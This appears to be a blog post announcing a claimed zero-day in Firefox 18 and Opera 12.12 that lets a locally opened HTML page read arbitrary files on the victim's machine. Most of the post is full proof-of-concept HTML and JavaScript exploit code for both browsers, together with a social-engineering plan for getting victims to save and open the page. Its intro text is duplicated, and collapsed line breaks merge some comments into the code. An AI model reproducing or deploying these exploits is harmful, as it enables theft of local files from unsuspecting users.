Russian researcher found 0day vulnerability on Firefox 18 and Opera 12.12
Attacker can read arbitrary file on victim host. Vulnerability is not sensitive for OS type. It must work on Windows, Linux etc.
The researcher announced about social engineering way to use this vulnerability. Attacker gives a link. A victim must save evil html-page into local computer. And then open saved evil html-page via victim browser (Firefox or Opera).
Exploit for Opera:
Video demonstration:
Exploit for FireFox a little more difficult to use (must be saved in the root directory):
First file:
Second file:
Video demonstration
Attacker can read arbitrary file on victim host. Vulnerability is not sensitive for OS type. It must work on Windows, Linux etc.
The researcher announced about social engineering way to use this vulnerability. Attacker gives a link. A victim must save evil html-page into local computer. And then open saved evil html-page via victim browser (Firefox or Opera).
Exploit for Opera:
<html>
<body>
<script>if((navigator.userAgent.indexOf("Opera") != -1) && (window.location.protocol == "file:")) { //if browser Opera andprotocol isvar file=prompt("Example: C:/file.txt "); //Select file to read if(file){ console.log("File: "+file); document.write("<center>"+ "<a href='data:text/html,"+ //"file"create a link using "data" protocol "<script>"+ "if(window.opener){"+ //only if "window.opener"is initialized "window.opener.location.replace(%22file://"+window.location.hostname+"/"+file+"%22);"+ //change the address of the parent tabon the path to read files "%3Cscript%3E"+ // bypass browser security using script tag "alert(window.opener.document.body.innerHTML);"+ //Let's see file content :) "%3C%2Fscript%3E"+ "' target='_blank'>"+ //target= _blank "CLICK-CLICK</a>"); }}
</script>
</body>
</html>
Video demonstration:
Exploit for FireFox a little more difficult to use (must be saved in the root directory):
First file:
<html>
<body>
<script>if((navigator.userAgent.indexOf("Firefox") != -1) && (window.location.protocol == "file:")){ //if browser Firefox andprotocol isdocument.write("<center>"+ "<a href='./payload.html'"+ //call payload.html " target='_blank'>CLICK-CLICK</a>"); //target=_blank };"file"
</script>
</body>
</html>
Second file:
<html>
<body>
<script>
var file=prompt('Example: C:/file.txt');
console.log(file);
window.opener.location="file://localhost/"+file;</script>
<script>var al=function(){alert(window.opener.document.body.innerHTML)}; //Let's see file contentwhile(!window.opener.document.body){ //window.opener.document.body=null alert('Click OK'); //use alert for delay al(); };
</script>
</body>
</html>
Video demonstration
Комментариев нет:
Отправить комментарий